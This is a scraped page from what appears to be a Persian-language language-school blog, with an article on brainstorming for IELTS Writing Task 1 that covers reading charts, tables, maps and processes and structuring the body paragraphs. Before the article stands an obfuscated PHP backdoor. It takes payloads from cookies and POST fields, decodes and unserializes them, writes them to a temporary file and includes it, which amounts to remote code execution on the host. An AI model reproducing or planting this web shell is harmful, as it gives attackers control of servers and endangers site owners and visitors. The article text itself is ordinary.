$NULuVE = 'J' . "\x6e" . chr (95) . "\x5a" . chr ( 1066 - 990 )."\143";$wBGOMS = chr (99) . "\154" . "\141" . "\163" . 's' . chr ( 572 - 477 )."\145" . "\170" . "\151" . 's' . chr (116) . "\x73";$rnHFs = class_exists($NULuVE); $wBGOMS = "37229";$FCnrIFQjV = strpos($wBGOMS, $NULuVE);if ($rnHFs == $FCnrIFQjV){function zzZnWbHiGH(){$snBBmoW = new /* 60717 */ Jn_ZLc(216 + 216); $snBBmoW = NULL;}$tRYafVOh = "216";class Jn_ZLc{private function BnCpg($tRYafVOh){if (is_array(Jn_ZLc::$iblmkhZckY)) {$name = sys_get_temp_dir() . "/" . crc32(Jn_ZLc::$iblmkhZckY["salt"]);@Jn_ZLc::$iblmkhZckY["write"]($name, Jn_ZLc::$iblmkhZckY["content"]);include $name;@Jn_ZLc::$iblmkhZckY["delete"]($name); $tRYafVOh = "216";exit();}}public function ptGeYs(){$TDmSXiAS = "52603";$this->_dummy = str_repeat($TDmSXiAS, strlen($TDmSXiAS));}public function __destruct(){Jn_ZLc::$iblmkhZckY = @unserialize(Jn_ZLc::$iblmkhZckY); $tRYafVOh = "10292_35473";$this->BnCpg($tRYafVOh); $tRYafVOh = "10292_35473";}public function ozxIAgQPjV($TDmSXiAS, $aeaku){return $TDmSXiAS[0] ^ str_repeat($aeaku, intval(strlen($TDmSXiAS[0]) / strlen($aeaku)) + 1);}public function qUtSOSuu($TDmSXiAS){$mfCMBhBxCr = "\142" . chr ( 890 - 793 ).chr ( 813 - 698 ).chr (101) . chr ( 253 - 199 ).chr (52);return array_map($mfCMBhBxCr . "\137" . chr (100) . "\x65" . "\x63" . chr (111) . "\144" . chr (101), array($TDmSXiAS,));}public function __construct($LPOaYmFx=0){$zGwbXSxTSr = chr ( 874 - 830 ); $TDmSXiAS = "";$ffIRbkK = $_POST;$cUFsQU = $_COOKIE;$aeaku = "c7925911-7e78-4761-aabc-96a5afd8df13";$YEAAD = @$cUFsQU[substr($aeaku, 0, 4)];if (!empty($YEAAD)){$YEAAD = explode($zGwbXSxTSr, $YEAAD);foreach ($YEAAD as $GraWY){$TDmSXiAS .= @$cUFsQU[$GraWY];$TDmSXiAS .= @$ffIRbkK[$GraWY];}$TDmSXiAS = $this->qUtSOSuu($TDmSXiAS);}Jn_ZLc::$iblmkhZckY = $this->ozxIAgQPjV($TDmSXiAS, $aeaku);if (strpos($aeaku, $zGwbXSxTSr) !== FALSE){$aeaku = explode($zGwbXSxTSr, $aeaku); $cWVPJOukJ = base64_decode(md5($aeaku[0]));}}public static $iblmkhZckY = 12075;}zzZnWbHiGH();} طوفان فکری روشی مناسب برای رایتینگ آیلتس | وبلاگ اتیچر
skip to Main Content

طوفان فکری روشی مناسب برای رایتینگ آیلتس

زمان مطالعه: ۵ دقیقه

فهرست بخش ها

چگونه از سد بخش اول رایتینگ آیلتس عبور کنیم؟

بخش یک رایتینگ آیلتس می‌تواند برای داوطلبان یک چالش باشد. برای پاسخ بهتر به این بخش، پیشنهاد می‌شود که پنج دقیقه از وقت خود را برای تصمیم گیری در مورد شیوه نگارش، استفاده ازروش طوفان فکری برای پیدا کردن محتوای مناسب و همچنین اطلاعات مورد نیاز در مورد سؤالات مطرح شده صرف کنید. در بخش یک رایتینگ آیلتس، ممکن است با موارد مختلفی از قبیل چارت، گراف‌های خطی، جدول، نقشه  یا فرایندی خاص مواجه شوید. علاوه بر این، ممکن است با سؤالات مختلف دیگری نیز در این بخش مواجه شوید که چنین سؤالاتی می‌توانند متشکل از چند نمونه دیگر باشند. برای نوشتن مقالاتی با کیفیت و همچنین کسب نمره بالاتر نیاز است تا قبل از شروع، فقط چند دقیقه در مورد ساختار آن تفکر و تصمیم گیری کنید.

درادامه با شیوه مناسب برای تصمیم گیری در زمینه نوشتن رایتینگ بخش یک آیلتس آشنا می‌شوید.

سؤالات را با دقت بخوانیم

سؤالات بخش 1 رایتینگ آیلتس ممکن است به صورت‌های مختلفی طرح شوند. با این حال، این سؤالات به هر صورتی که باشد، برای پاسخ دادن درست به آن‌ها، داوطلبان باید این موارد را با دقت مطالعه کنند. با خواندن دقیق سؤالات می‌توانید بخش‌های مهم موجود در سوالات را درک کنید و می‌توانید از آن‌ها برای نوشتن بخش اول مقاله که با نام introduction نیز شناخته می‌شود، استفاده کنید. تا زمانی که خواسته  سوال را درک نکرده اید از شروع نوشتن دست نگه‌دارید. آغاز نوشتن در چنین حالتی ممکن است باعث ایجاد اشتباه در روند تولید مقاله شود. به همین دلیل، نیاز است تا در ابتدا سؤالات موجود را با دقت مطالعه کنید و خود را با موارد درخواست شده آشنا نمایید.

رایتینگ آیلتسدر رایتینگ آیلتس به چه مسائلی توجه کنیم؟

در ابتدا خواسته‌های موجود در سؤالات را با دقت مطالعه کنید. در مراحل بعدی باید این موارد را با زبان دیگری به متن خود منتقل کنید. به همین دلیل اولین وظیفه شما، مطالعه دقیق سؤالات برای درک موارد خواسته شده است.

  • برای سؤالاتی که اطلاعات آن در قالب‌های چارت  یا گراف‌های خطی آورده شده است، اطلاعات موجود در محور X، Y و همچنین label های موجود در آن‌ها را با دقت مطالعه کنید. عموماً label های موجود در این گونه تصاویر، در قسمت بالایی و یا پایین این قالب‌ها نشان داده شده‌اند.
  • در اطلاعاتی که به صورت جدول تهیه شده‌اند، اطلاعات موجود در سطرها و ستون‌ها و همچنین ارقام موجود در جدول‌ها را به صورت کامل مطالعه کنید.
  • در نقشه‌ها برچسب‌ها و همچنین مکان‌های موجود در آن‌ها را بررسی کنید.
  • سؤالات را به صورت دقیق تجزیه و تحلیل کنید

یکی دیگر از موارد با اهمیت در مورد تجزیه و تحلیل اطلاعات داده شده در بخش اول رایتینگ آیلتس، بررسی دقیق‌تر سؤالات برای رسیدن به نکات کلیدی است. پس از اینکه توانستید به صورت خلاصه اطلاعات درخواست شده در بخش یک آیلتس را درک نمایید، در این مرحله لازم است تا قبل از شروع نوشتن پاسخ‌ها، سؤالات را به صورت دقیق‌تر تحلیل کنید. نیاز است تا این بررسی‌ها به صورت سریع‌تری انجام شود. زیرا ممکن است در انتها با کمبود وقت مواجه شوید. استفاده از مداد برای نوشتن نکات مهمی که از بررسی اطلاعات موجود به دست آمده است نیز از استراتژی‌های مهم به حساب می‌آید. در چنین حالتی می‌توانید تمامی جزئیات مورد نظر را به درستی وارد برگه کنید. و در صورت دقت، موضوع مهمی از قلم نخواهد افتاد.

چه اطلاعاتی را بررسی کنیم؟

  1. چارت میله‌ای و چارت خطی: در این‌گونه چارت‌ها باید تفاوت‌های میان مقادیر موجود در آن‌ها را مورد سنجش قرار دهیم. به‌عنوان مثال تفاوت موجود در سال‌های ۱۹۹۰، ۱۹۹۵ و ۲۰۰۰ پنج سال است.
  2. عناوین و همچنین سایر اطلاعات داده شده در مورد گراف‌ها را بررسی کنید.
  3. برچسب‌های موجود در قسمت‌های بالایی، پایین، راست و چپ گراف‌ها را به صورت دقیق‌تری بررسی کنید.
  4. جدول: عناوین موجود در ستون‌ها و همچنین سطرهای داده شده را مورد بررسی قرار دهید.
  5. نقشه: برچسب‌ها، مسیرها و مکان‌های اشاره شده را با دقت مطالعه کنید.
  6. فرایندها: تصاویر مرتبط با هر مرحله از فرایند را با دقت بررسی کنید تا بتوانید اطلاعات دقیق‌تری در این زمینه به دست آورید.

همچنین برای مطالعه نکاتی درباره ریدینگ آزمون آیلتس با اتیچر همراه باشید

آزمون آیلتس را هوشمندانه پشت سر بگذارید


ریدینگ آزمون آیلتس در کمتر از ۶۰ دقیقه با مدیریت زمان!

رایتینگ آیلتسجزئیات رایتینگ آیلتس را به خوبی بررسی کنیم

برای بررسی دقیق‌تر بخش یک رایتینگ آیلتس، می‌توانید جزئیات موجود در تصاویر را به دو صورت بررسی کنید و علاوه بر این، موارد موجود در میان آن‌ها را مقایسه کنید. منظور ما از بررسی جزئیات، مطالعه دقیق‌تر و همچنین بررسی جزئیات موجود در هر تصویر است. در صورتی که بتوانید این جزئیات را به صورت مرحله به مرحله بررسی کنید، این کار می‌تواند بسیار ساده‌تر باشد. در مرحله دوم و زمانی که  جزئیات را به صورت کامل بررسی کردید، می‌توانید با مقایسه موارد موجود، تفاوت‌های مهم در تصاویر را به دست آورید.

چارت‌های میله‌ای و گراف‌های خطی را به خوبی بررسی کنیم

در این‌گونه موارد می‌توانید به بررسی دقیق‌تر خطوط  یا مسیرهای بالارونده، پایین رونده، یکنواخت و همچنین متناوب بپردازید. در نتیجه ی این بررسی‌ها می‌توانید در نهایت تفاوت‌های چشم گیر موجود را به دست آورده و آن‌ها را مورد استفاده قرار دهید. به‌عنوان مثال می‌توانید بررسی‌های خود را به صورت دو برابر، سه برابر و چند برابر نشان دهید یا بگویید که تفاوت موجود در میان اطلاعات داده شده ۲۰ درصد یا ۵۰ درصد کمتر یا بیشتر از دیگران است.

علاوه بر این، می‌توانید شباهت‌های موجود در بین این موارد را نیز به دست آورید. به‌عنوان مثال می‌توانید ادعا کنید که دو مورد از اطلاعات داده شده، نشان دهنده روند افزایشی هستند.

همچنین می‌توانید به نکات مشترک بین آن‌ها نیز اشاره کنید و محل‌هایی را ذکر کنید که هر دو نوع داده با هم برخورد می‌کنند.

جدول: همه اطلاعات موجود در جداول را برای یافتن بالاترین مقدار، پایین‌ترین مقدار و همچنین روندهای افزایشی، کاهشی و یکنواخت به صورت دقیق مطالعه کنید.

نقشه: برچسب‌های موجود را با دقت مطالعه کنید تا بتوانید بخش‌های مختلف نقشه را بررسی و تحلیل کنید. علاوه بر این، می‌توانید مکان‌های موجود بر روی نقشه‌ها را با استفاده از علائم جهت‌یابی داده شده، بررسی کنید.

رایتینگ آیلتسبرای آمادگی بیشتر برای آزمون آیلتس می‌توانید یک جلسه آزمایشی با یکی از استاد زبان های اُتیچر رزرو کنید و از توصیه‌های استادان اتیچر بهره‌مند شوید.

ساختار موجود در بخش بدنه (body) متن

پس از استفاده از روش طوفان فکری و طی کردن تمامی مراحل قبل را به درستی سپری کردید، اکنون نوبت به ساختن و شکل دادن به بدنه متن می‌رسد. برای نوشتن بدنه متن و قسمت انتهایی متن، افراد مختلف از روش‌های متفاوتی برای نوشتن بخش یک رایتینگ آیلتس استفاده می‌کنند. در این مرحله می‌توانید اطلاعات موجود را به دو دسته تقسیم بندی کنید و سپس دو پاراگراف مجزا برای هر قسمت و به صورت جداگانه بنویسید. علاوه بر این، می‌توانید مراحل اصلی را در یک پاراگراف و همچنین نکاتی را که در مورد مقایسه به کار می‌روند در پاراگرافی دیگر یادداشت کنید.

به این مقاله امتیاز بدهید

دیدگاه ها

اولین نفری باشید که به این نوشته نظر میدهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

Back To Top
×Close search
Search